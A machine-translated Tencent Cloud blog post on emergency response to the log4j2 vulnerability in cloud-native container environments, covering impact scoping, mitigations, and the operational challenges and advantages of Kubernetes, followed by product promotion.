Security construction and security operation under cloud native architecture from the perspective of major vulnerability emergency (Part 1)

foreword

In recent years, cloud-native architecture has been widely deployed and used, and the proportion of business containerized deployment has increased year by year. 0-day security incidents such as sudden major vulnerabilities often bring major challenges to security emergency response. For example, the outbreak of major vulnerabilities that were widely affected some time ago can be said to be a big test for security construction and security operations under the cloud-native architecture.

This article will take this high-risk arbitrary code execution vulnerability as a case to share the thinking of security construction and security operation under the cloud native architecture.

Vulnerability Handling Review

After the vulnerability broke out, the first concern must be whether the attacker can exploit the vulnerability to attack the business system, and what methods can be used to carry out the attack. For container environments, from an attack perspective, there are usually the following intrusion paths.

figure 1

1) Attack through the container host . This is usually caused by host configuration problems, such as Docker RemoteAPI that is open to the public network and does not have authentication enabled, or Kubernetes API Server that does not have authentication enabled.

2) Attack through vulnerable containers . This type of attack mainly takes the vulnerability of applications deployed in the container environment as the attack breakthrough.

3) Attack through poisoned images . Mainly by poisoning the mirror in the public warehouse, when the mirror is pulled and run, related attack operations can be performed.

What can an attacker do?

The impact of this log4j2 vulnerability is mainly reflected in the second attack method, that is, the attacker will use the vulnerability to attack the containerized application through the affected application.

Once the first step of exploiting the vulnerability is successful, the next step is to execute malicious programs on the host according to the usual infiltration attack logic; , also includes east-west network-level mobile attacks.

How to quickly respond to disposal?

Under the cloud-native architecture, the general idea of ​​emergency response to vulnerabilities is the same as that of traditional security incidents. First of all, it is necessary to analyze the principle of the vulnerability and the way that it may be exploited, determine the repair and mitigation plan, and formulate the protection rules of related security products to realize the detection and interception of vulnerability utilization, and finally repair and deal with the vulnerability in an orderly manner.

In the container environment, some key operation steps can be sorted out as follows:

  • First, the scope of the impact of the existing business needs to be determined. For example: determine all the mirror images affected by the vulnerability in the warehouse, and determine the affected online business;

  • Second, upgrade the protection strategies of related security products. For example, WAF rules and firewall rules can be used to temporarily block exploits to a certain extent; if necessary, upgrade the runtime detection strategy. Once the intrusion is successful, it can be quickly discovered and dealt with.

  • Finally, it is to fix the vulnerability and upgrade to the officially released fixed version.

why it's not easy

The efficiency of security emergency or security operations largely depends on the construction of security capabilities. The above disposal steps are relatively ideal disposal procedures, or disposal procedures that can be easily implemented only on the basis of a complete set of security capability building.

According to the "Tencent Cloud Container Security White Paper" released by Tencent Cloud in November 2021, the current cloud-native users have uneven security capabilities, such as image vulnerability scanning, host security hardening, and cluster monitoring and auditing. capacity, the proportion of landing deployment is only about 50%, and even 7% of users do not have any security capabilities when using cloud native.

figure 2

Therefore, under the current situation, facing 0day vulnerabilities like log4j2, it is inevitable that there will be various problems in emergency response.

Control the sphere of influence

For the disposal of vulnerabilities, the first step is to control the scope of the vulnerability. Because the repair of the vulnerability requires a certain period of time, and a component such as log4j2 is so widely used, it is even predicted that the impact of the vulnerability will last for a long time, so it is also very important to control the increase of new impact assets.

This is mainly reflected in two aspects:

(1) Prevent warehousing containing vulnerable images. In the stages of CI integration and image storage, strict security checks are required to prevent the introduction of vulnerabilities.

(2) Prevent the operation of images containing vulnerabilities. When a new service starts and runs, it is necessary to detect whether the relevant images contain vulnerabilities. For images that fail the security inspection, they must be strictly prevented from starting and running.

How to determine the scope of impact

1) Identify all images affected by the vulnerability

When determining the affected scope of the business, if the container image security scanning capability is deployed, the security vendor will usually update the vulnerability database or detection rules as soon as possible, and users can directly scan all the images in the mirror warehouse to find the affected mirror.

If image security scanning is not deployed, Tencent Cloud Container Security Service provides a 7-day free trial , where users can use the image scanning function to check image assets. In the worst case, users can use open source image scanning tools (such as Clair/Anchore/Trivy, etc.) to troubleshoot the problem, but one thing to note is that before using open source tools, make sure that the vulnerability library or detection rules already contain the target vulnerabilities. detection.

2) Identify affected operational workloads

After the affected images are determined, the affected online services need to be determined according to this list. If our daily security operations are done well enough, in theory this list should be consistent with the list of affected businesses. Or we need to deploy the corresponding security capabilities to realize the mapping of image assets to online business assets.

If none of these are available, you need to retrieve the currently used image cluster by cluster to determine whether it is affected. For example, you can use the most rude command "kubectl describe pods --all-namespaces| grep image" to obtain the information about the cluster running business. All mirrors used.

At this point, we found that if there are too many images in the warehouse, another way of thinking can be adopted. First, use a command like "kubectl describe pods --all-namespaces| grep image" to query all online clusters one by one. Mirrors used by the business, and then perform vulnerability detection on these mirrors.

how to fix

Faced with the outbreak of vulnerabilities, everyone hopes to fully understand the vulnerability and use the corresponding patches to solve the problem as soon as possible. Unfortunately: on the one hand, software development and testing require time cycles, and the repair of vulnerabilities will not be so fast; on the other hand, under the microservice architecture, the affected images may be very large, which also brings about the repair of vulnerabilities. Great challenge.

Therefore, while the vulnerability is fixed, we can mitigate it with suggested mitigations, for example, for log4j2 vulnerability, the jvm startup parameter can be added:

-Dlog4j2.formatMsgNoLookups=true for temporary relief.

However, under the cloud-native architecture, the application startup commands and operating parameters are directly packaged in the image, which returns to the problem mentioned above. If the number of affected images is very large, this kind of Temporary mitigation measures will also face significant challenges in implementing them.

Under a cloud-native architecture, we see that there are several mitigation actions for vulnerabilities:

(1) Modify the online operating environment

We can use the kubectl edit pod... command to modify the running parameters of the online service Pod to mitigate the vulnerability. For batch modification of operating parameters, we have also launched an open source tool.

It is worth noting that the above disposal method will automatically restart the service after modifying the parameters, and the user needs to evaluate the corresponding restart risk when using it.

image 3

(2) Mitigation by exploiting vulnerability features

Take log4j2 as an example, this is a vulnerability of remote arbitrary code execution. In short, when printing the log, if it is found that the log content contains the keyword ${, then the content contained in the log will be replaced as a variable, resulting in an attack can execute commands arbitrarily.

Therefore, when performing vulnerability mitigation, this feature of the vulnerability can be utilized, and the mitigation instruction can be passed in through the vulnerability to achieve the effect of exploiting the vulnerability to mitigate the vulnerability.

This method targets different vulnerabilities and is not universal.

(3) Blocking of exploits

The first two operations are based on the vulnerability itself, and through mitigation methods, the vulnerability cannot be exploited. Another mitigation measure is that once the aforementioned mitigation measures fail or are bypassed, operations can be intercepted on the critical path of vulnerability exploitation, thereby achieving the effect of vulnerability mitigation.

This operation has a certain dependence on the security capability. On the one hand, the security capability needs to be able to detect the behavior of vulnerability exploitation, and on the other hand, it needs to be able to accurately block the process behavior. Especially for the vulnerability of arbitrary code execution such as log4j2, the detection of vulnerability exploitation has high requirements on security capabilities.

After passing the above-mentioned temporary mitigation measures, the next thing we need to do is to upgrade the affected components to the officially released stable repair version in an orderly manner, taking into account the mirrors used in the online environment and factors such as business importance and priority.

Challenges and advantages of secure operation under cloud native architecture

From the above-mentioned vulnerability disposal process, we can find that the container environment faces certain challenges and also has certain advantages in terms of vulnerability disposal and repair under the cloud-native architecture.

challenge

**1) The number of mirrors is large. **On the one hand, since log4j2 itself is a component with a wide range of applications, and under the microservice architecture, the application will perform many fine-grained microservice splits, so the affected images in the warehouse will involve many Repositories; on the other hand, due to the use of agile development processes such as DevOps, each image in the image repository will have many versions (each Repository has many Tags). Therefore, in the process of vulnerability disposal, it will be found that the number of affected images scanned is huge.

2) Zombie mirroring . The so-called zombie image can actually be understood as the old version image stored in the warehouse, or the expired image, which is almost no longer used by running. If there is no good management mechanism for the images in the repository, the number of such zombie images will also be very large. This phenomenon is actually quite understandable. DevOps brings about rapid business iteration, which naturally generates a large number of expired images.

In normal security operations, in principle, these zombie images should be removed in time (there is no need to consider the issue of backup and rollback, the code repository will have it). This removal operation not only needs to cover the mirror repository, but also applies to the host Zombie mirror on .

3) Immutable infrastructure . A typical feature of cloud-native architecture is immutable infrastructure. The so-called immutable infrastructure means that once a service is deployed, it is never allowed to be modified. If something needs to be updated, repaired or modified in any way, the corresponding image needs to be modified, a brand new service image is built to replace the old service image that needs to be changed, and after verification, the service is redeployed with the new image, and The old ones will be deleted.

This feature brings a lot of inconvenience to us when we perform vulnerability mitigation for online services. On the one hand, it is reflected in the modification of information such as operating parameters and environment variables of the application; on the other hand, it is reflected in the modification of such mitigation measures, which will trigger another warning of runtime security, because this operation violates the requirements of immutable infrastructure. Not a normal business operation process.

Advantage

• Asset visualization, quick positioning . Assets have always been an important issue in safe construction and safe operation, and they are also the most troublesome. Cloud-native architecture solves the problem of assets very well. Through orchestration platforms such as Kubernetes and components such as image repositories, we can quickly sort out assets and locate problems.

• Process automation and take effect quickly . Orchestration platforms such as Kubernetes provide a complete set of business automation management solutions, including configuration management, service orchestration, and task management. Therefore, the repair of the vulnerability can achieve rapid distribution and corresponding grayscale upgrade.

• Safe left shift for quick control . It can perform security left-shift detection in multiple links such as CI/CD, detect images before storage, prevent images containing vulnerabilities from being pushed to the warehouse, and reduce incremental risks; perform access detection at runtime, for images containing vulnerability risks, Prevent it from starting and running, and reduce the newly exposed surface of the online environment.

• Microservice architecture . Under the microservice architecture, applications are relatively independent, which brings benefits to vulnerability repair. On the one hand, the vulnerability repair for a certain image has a small impact and improves the efficiency of vulnerability repair; on the other hand, under the microservice architecture, service Single function, many duplicate functions will form independent services, which reduces the number of repairs.

The outbreak of this vulnerability has sounded the alarm for us in the construction and operation of cloud-native security. Taking this incident as an entry point, enterprises need to comprehensively consider the construction and operation of security capabilities in the process of implementing the cloud-native architecture. . In the next article, based on our own practice, we will systematically share our thoughts on security construction and security operations under the cloud native architecture.

About Tencent Container Security Service (TCSS)

Tencent Container Security Service (TCSS) provides security services such as container asset management, image security, cluster security, runtime intrusion detection , etc., to ensure the security of the full life cycle of containers from image construction, deployment to runtime, and help enterprises build containers safety protection system.

Tencent launched a comprehensive cloud-native cloud migration strategy on September 30, 2018, and has so far had a core scale of tens of millions. The container security service product team combines the industry's largest container cluster security governance and operation experience to polish products, promote the formulation and formulation of industry standards and specifications, and firstly publish the "Tencent Cloud Container Security White Paper" to analyze and summarize the current security status of domestic container environments to help cloud native Standardization and healthy development of safety ecology.

about Us

Immediately follow the official account of [Tencent Cloud Native], reply to "Tencent and Tiger", and receive Tencent's custom red envelope cover~

Welfare:

① Reply to the [Manual] in the background of the official account, you can get the "Tencent Cloud Native Roadmap Manual" & "Tencent Cloud Native Best Practices"~

②The official account will reply to the [series] in the background, and you can get "15 series of 100+ super practical cloud native original dry goods collection", including Kubernetes cost reduction and efficiency enhancement, K8s performance optimization practices, best practices and other series.

③If you reply to the [White Paper] in the background of the official account, you can get the "Tencent Cloud Container Security White Paper" & "The Source of Cost Reduction - Cloud Native Cost Management White Paper v1.0"

③ Reply to [Introduction to the Speed ​​of Light] in the background of the official account, you can get a 50,000-word essence tutorial of Tencent Cloud experts, Prometheus and Grafana of the speed of light.

[Tencent Cloud Native] New products of Yunshuo, new techniques of Yunyan, new activities of Yunyou, and information of cloud appreciation, scan the code to follow the public account of the same name, and get more dry goods in time! !

{{o.name}}
{{m.name}}

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=324125380&siteId=291194637